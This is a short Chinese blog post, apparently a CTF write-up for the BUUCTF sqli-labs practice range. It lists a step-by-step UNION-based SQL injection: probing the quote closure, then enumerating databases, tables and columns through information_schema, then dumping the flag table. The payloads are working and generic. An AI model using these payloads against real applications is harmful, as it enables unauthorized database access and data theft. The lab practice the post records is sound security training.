Buuctf | sqli-labs

这个是赵师傅给我们提供的训练靶场,最好都打一遍,但是出于找flag的角度,特此记录一下,flag在哪里【没错,我就是喜欢我的蓝变红,哈】


?id=1' :报错,说明就是用这个闭合的 

?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+

 

 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+

 

 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+

 

 ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+

 

posted @ 2019-10-14 12:47  东坡肉肉君  阅读(2138)  评论(0编辑  收藏  举报